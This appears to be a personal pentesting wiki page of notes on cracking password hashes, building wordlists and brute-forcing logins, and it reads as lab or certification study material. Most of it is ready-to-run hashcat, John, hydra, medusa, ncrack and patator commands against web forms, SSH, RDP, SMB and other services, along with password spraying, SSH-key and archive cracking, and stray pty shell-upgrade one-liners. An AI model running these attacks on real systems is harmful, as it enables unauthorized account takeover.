akde/infosec

Information security is ultimately about managing risk


(!) See also Password spraying to check an obtained password against usernames.

  1. Check the hash against online databases:
    1. https://hashkiller.co.uk
    2. https://hashes.org/
    3. https://crackstation.net/
    4. https://www.onlinehashcrack.com/
  2. Define your own wordlist first, e.g. if a web site is available (cewl!)
  3. Use a predefined wordlist
  4. Crack.

Note: Use http://rumkin.com/tools/cipher/ if you have to encode, decrypt or decipher something on the fly.

Wordlist optimization

If a password policy is known:

  • Remove all passwords from the list that do not satisfy the requirements.
  • Build your own wordlist following the policy rules.

Check password policy

In Windows, type

net accounts

to get information about account lockout, lockout thresholds, etc.

Cloud-based performance cracking

See NPK

Default passwords

Hashcat

Fastest on the iMac:

/opt/hashcat/hashcat -m1800 -a0 -O --self-test-disable -r /opt/hashcat/rules/best66.rule test.hash /opt/wordlists/rockyou.txt

/opt/hashcat/hashcat -m1800 -a0 -O --self-test-disable -r /opt/hashcat/rules/rockyou-30000.rule test.hash /opt/wordlists/rockyou.txt

Note: You can add multiple wordlists!

Resume if the session was previously interrupted with -c:

/opt/hashcat/hashcat --session name_der_sitzung --restore

Determine the type of a hash (escape any $ in the hash):

hashid <hash_dollar_maskieren>
hash-identifier

Show sample hashes and search for a format (quote the pattern, otherwise the shell expands $9 to an empty string):

hashcat --sample-hashes | grep -F '$9$'

Parameters:

  • -a <attack_mode>
    0 = Straight
    1 = Combination
    2 = Toggle-Case
    3 = Brute-force
    4 = Permutation
    5 = Table-Lookup
    8 = Prince
  • -m <hash_type> (see man hashcat)
    1600 = Apache MD5 (for .htaccess, although there are also other formats)
    1800 = SHA-512(Unix)

Hash for­mats: https://hashcat.net/wiki/doku.php?id=example_hashes

Modify wordlists with rules

Hashcat can parse .rule files which describe transformations of the wordlist. Each line in a rule file defines one transformation.

An example, where each word becomes three words:

$ cat list1.rule
$1
c
$!

Another example, where each word stays one word to which all rules are applied in sequence:

$ cat list1.rule
$1 c $!

This file leads to the transformation of every word by

  • adding a 1 after the word,
  • capitalizing the word and
  • adding a ! at the end.

The following command prints the changed wordlist:

hashcat -r list1.rule --stdout list.txt

Note: /usr/share/hashcat/rules/ contains many example rules. See https://hashcat.net/wiki/doku.php?id=rule_based_attack for all operations.
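As an added example (neither the page's nor hashcat's own code), a small Python interpreter for the rule functions used in the two rule files above, plus a policy filter of the kind suggested under "Wordlist optimization" and by pw-inspector. It shows why the three-line file yields three candidates per word while the one-line file yields one, and that a candidate such as Password1! passes a typical complexity policy; the policy (8+ chars, upper, lower, digit, special) is an assumed example, and only the functions l, u, c, t, r, $X and ^X are implemented.

```python
import re

def apply_rule(word, rule):
    """Apply one rule line (whitespace-separated functions) to a word.
    Functions: 'l' lower, 'u' upper, 'c' capitalize (first letter upper,
    rest lower), 't' toggle case, 'r' reverse, '$X' append X, '^X' prepend X."""
    for fn in rule.split():
        if fn == "l":
            word = word.lower()
        elif fn == "u":
            word = word.upper()
        elif fn == "c":
            word = word[:1].upper() + word[1:].lower()
        elif fn == "t":
            word = word.swapcase()
        elif fn == "r":
            word = word[::-1]
        elif len(fn) == 2 and fn[0] == "$":
            word = word + fn[1]
        elif len(fn) == 2 and fn[0] == "^":
            word = fn[1] + word
        else:
            raise ValueError(f"unsupported rule function: {fn!r}")
    return word

def expand(words, rule_lines):
    """Every rule line yields one candidate per word (like hashcat -r ... --stdout).
    Blank lines and '#' comments in the rule file are ignored."""
    rules = [r for r in rule_lines if r.strip() and not r.lstrip().startswith("#")]
    return [apply_rule(w, r) for w in words for r in rules]

# Assumed example policy: at least 8 chars with upper, lower, digit and special.
POLICY = [r".{8,}", r"[A-Z]", r"[a-z]", r"[0-9]", r"[^A-Za-z0-9]"]

def meets_policy(candidate):
    return all(re.search(p, candidate) for p in POLICY)

def policy_compliant(words, rule_lines):
    """Candidates that a policy filter (pw-inspector style) would keep in the list."""
    return [c for c in expand(words, rule_lines) if meets_policy(c)]

if __name__ == "__main__":
    three_lines = ["$1", "c", "$!"]   # the first rule file from the notes
    one_line = ["$1 c $!"]            # the second rule file from the notes
    print(expand(["password"], three_lines))  # ['password1', 'Password', 'password!']
    print(expand(["password"], one_line))     # ['Password1!']
    print(policy_compliant(["password", "sun"], one_line))  # ['Password1!']
```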

Hash determination

hash-identifier

Takes a hash and guesses the algorithm.

Wordlist creation

crunch

Creates combinations of characters.

crunch <min> <max> <zeichenmenge> -o out.txt

E.g. crunch 2 3 0123456789 -o /tmp/o.txt creates all combinations of digits with two to three positions.

Crunch can also create passwords following patterns. That is very useful if you e.g. know the password policy or can otherwise constrain the structure of the passwords.

crunch 8 8 -t ,@@^^%%% // see Offsec PDF, page 269

cewl

cewl can crawl sites and extract password candidates, which can then be used to create passwords following a pattern. (-m = minimum word length, -d = recursion depth when following links)

cewl -m 6 -d 1 www.megacorpone.com > megacorp-cewl.txt

Use John to mutate a wordlist, or use pw-inspector to filter the list so that only candidates complying with known password rules remain.

pw-inspector -i cewl.txt -m 6 -M 20

John the ripper

John the Ripper (JtR) can create variations of password lists which were created e.g. with cewl.

https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf

./john --wordlist=/tmp/wl --rules:Extra --stdout > /tmp/customwordlist

./john --wordlist=/opt/rockyou.txt /tmp/zip.hash // don't forget!

john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

This applies the default mutation rules. To e.g. add two digits after each password, add the following two lines to /etc/john/john.conf in the section [List.Rules:Wordlist] (the first line appends one digit, the second two):

# Add one number to the end of each password
$[0-9]
# Add two numbers to the end of each password
$[0-9]$[0-9]

Note: See https://null-byte.wonderhowto.com/forum/to-use-multiple-threads-cpus-while-cracking-passwords-with-john-ripper-free-version-0187017/ on using all CPU cores.

Brute force

Medusa

Medusa understands many protocols which can be tested against wordlists. Can be used for FTP, HTTP, SSH, …

Doesn't seem to work with virtual hosts!

medusa -h $victim -u admin -P password-file.txt -M http -m DIR:/admin -T 10
medusa \
  -h 10.11.1.44 \
  -u admin \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"admin" \
  -m DENY-SIGNAL:"invalid password" \
  -m FORM-DATA:"post?u=&password=&send=%2Fadmin%2Fsite&login="
medusa -h $victim -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/Admin -T 2

ncrack

High-speed cracking, faster than medusa in one example. Can also brute force Windows RDP.

ncrack -vv --user offsec -P password-file.txt rdp://$victim

Hydra

Note: xHydra can be used for configuration!

NOTE: http-post-form!

Also high-speed.

hydra -P password-file.txt -v $victim snmp

Another example, which performs HTTP POST requests. After the path and ":", the POST body is defined; after another ":", a string that indicates that the login attempt failed.

hydra $victim http-post-form "/admin/index.php:user=^USER^&pw=^PASS^:Wrong password" -l admin -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

If this doesn't work, a vhost can also be added via a Host header like :H=Host\: <vhost>

Another example, which checks a header of the response (to check the status code instead, use S=302):

hydra staging-order.mango.htb http-post-form "/:username=^USER^&password=^PASS^:H=location: home.php" -l admin -P /usr/share/wordlists/rockyou.txt -t 20 -w 30

Attack SMB/Samba:

hydra -l marko -P /usr/share/wordlists/rockyou.txt $victim smb

Add cookies to requests:

hydra $victim http-post-form "/bolt/bolt/login:user_login%5Busername%5D=^USER^&user_login%5Bpassword%5D=^PASS^&user_login%5Blogin%5D=&user_login%5B_token%5D=-UKrYiVKX6bHmuQbPI75IgdiBVf2FgPpxUpjpj352i4:F=Please check your input:H=Cookie: bolt_session_274a029ed9ae3bfc27bd20e0afcafdcc=871d6acbc17c5822417b1cb094" -l admin -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

Example with proxy and SSL (Burp):

HYDRA_PROXY_HTTPS=https://localhost:8080/ hydra $victim http-post-form "/admin:password=^PASS^&send=%2Fadmin%2Fsite&login=&gg=^USER^:F=invalid password:H=Cookie: session_id_issue_tracker=192.168.119.158-e1a56146-27a4-4946-b4a8-4fdf399e106a; session_id_admin=192.168.119.158-0436a0f5-f902-44de-8f80-8cf4567671e6" -l "" -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -S -I -s 8000

Telnet

hydra -P passwords.txt -L users.txt $victim telnet -V
hydra -C users_and_passwords.txt $victim telnet -V

SSH

hydra $target ssh -l eleanor -P /usr/share/wordlists/rockyou.txt

FTP

hydra -C users_and_passwords2.txt ftp://$victim

MySQL

hydra -C users_and_passwords2.txt mysql://$victim

SMTP

hydra -P /usr/share/wordlists/rockyou.txt -l root $target smtp -V

RDP

hydra -P /usr/share/wordlists/rockyou.txt -l albert rdp://192.168.165.227

Or, password spraying the other way round:

hydra -L dirb/others/names.txt -p "SuperPasswordFoundSomewhere" rdp://192.168.165.202
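From the defender's side, as an added example that is not part of the page: the two hydra patterns above, one account against a long password list versus a user list against a single password, leave distinguishable traces in sshd logs. The log lines and the thresholds are constructed assumptions; the parser relies only on the standard OpenSSH "Failed password" message.

```python
import re
from collections import defaultdict

# Constructed sample sshd lines (not real data); the message format is the
# standard OpenSSH "Failed password for [invalid user] USER from IP port N ssh2".
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 host sshd[2101]: Failed password for eleanor from 10.11.1.50 port 41022 ssh2
Mar  3 10:00:02 host sshd[2102]: Failed password for eleanor from 10.11.1.50 port 41023 ssh2
Mar  3 10:00:02 host sshd[2103]: Failed password for eleanor from 10.11.1.50 port 41024 ssh2
Mar  3 10:00:03 host sshd[2104]: Failed password for eleanor from 10.11.1.50 port 41025 ssh2
Mar  3 10:00:03 host sshd[2105]: Failed password for invalid user albert from 10.11.1.51 port 50001 ssh2
Mar  3 10:00:04 host sshd[2106]: Failed password for marko from 10.11.1.51 port 50002 ssh2
Mar  3 10:00:04 host sshd[2107]: Failed password for root from 10.11.1.51 port 50003 ssh2
Mar  3 10:00:05 host sshd[2108]: Failed password for bethany from 10.11.1.51 port 50004 ssh2
Mar  3 10:05:00 host sshd[2109]: Accepted password for eleanor from 192.168.1.7 port 33000 ssh2
Mar  3 10:06:00 host sshd[2110]: Failed password for eleanor from 192.168.1.7 port 33001 ssh2
"""

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def failures_by_source(log_text):
    """Map each source IP to (failure count, set of targeted usernames)."""
    count = defaultdict(int)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:  # accepted logins and unrelated lines are skipped
            count[m["ip"]] += 1
            users[m["ip"]].add(m["user"])
    return {ip: (count[ip], users[ip]) for ip in count}

def classify_sources(log_text, fail_threshold=4, spray_users=3):
    """Return {ip: verdict} for sources at or above fail_threshold failures.
    'brute-force': many failures against one or two accounts (hydra -l USER -P LIST)
    'spraying'   : failures spread over >= spray_users accounts (hydra -L USERS -p PW)
    Thresholds are assumed values; tune them to the lockout policy in force.
    """
    verdicts = {}
    for ip, (n, names) in failures_by_source(log_text).items():
        if n >= fail_threshold:
            verdicts[ip] = "spraying" if len(names) >= spray_users else "brute-force"
    return verdicts

if __name__ == "__main__":
    print(classify_sources(SAMPLE_AUTH_LOG))
    # {'10.11.1.50': 'brute-force', '10.11.1.51': 'spraying'}
```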

Patator

Break RDP (Remote Desktop) login

patator rdp_login host=$victim user='Maria' password=FILE0 0=/usr/share/wordlists/rockyou.txt.ascii

Break VNC login

patator vnc_login host=$victim password=FILE0 0=/usr/share/wordlists/rockyou.txt.ascii -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

Break telnet

patator telnet_login host=$victim inputs='FILE0\nFILE1' 0=users.txt 1=passwords.txt persistent=0 prompt_re='Username:|Password:' -x ignore:egrep='Login incorrect.+Username:'

Protocols

Crack OpenSSH identity keys

Convert the id_rsa file:

python /usr/share/john/ssh2john.py id_rsa > /tmp/id_rsa.hash

Run JtR:

john /tmp/id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

Run John the Ripper with rules:

  1. Add rules to /etc/john/john.conf:
    [List.Rules:sshRules]
    c $1 $3 $7 $!
    c $1 $3 $7 $@
    c $1 $3 $7 $#
  2. Execute
    john /tmp/id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules

File formats

PDF

pdfcrack --wordlist=/usr/share/wordlists/rockyou.txt $filename

or

/usr/share/john/pdf2john.pl file.pdf > /tmp/pdf.hash
john /tmp/pdf.hash

ZIP

/usr/share/john/zip2john.pl file.zip > /tmp/zip.hash
john /tmp/zip.hash // iterative
john -wordlist:/usr/share/wordlists/rockyou.txt /tmp/zip.hash // with wordlist
While cracking, have a look at the file names inside the archive with vi zip.zip.

fcrackzip [-D -p /usr/share/wordlists/rockyou.txt] t.zip

RAR

/usr/share/john/rar2john.pl file.rar > /tmp/rar.hash
john /tmp/rar.hash

Links and various notes


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.


python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';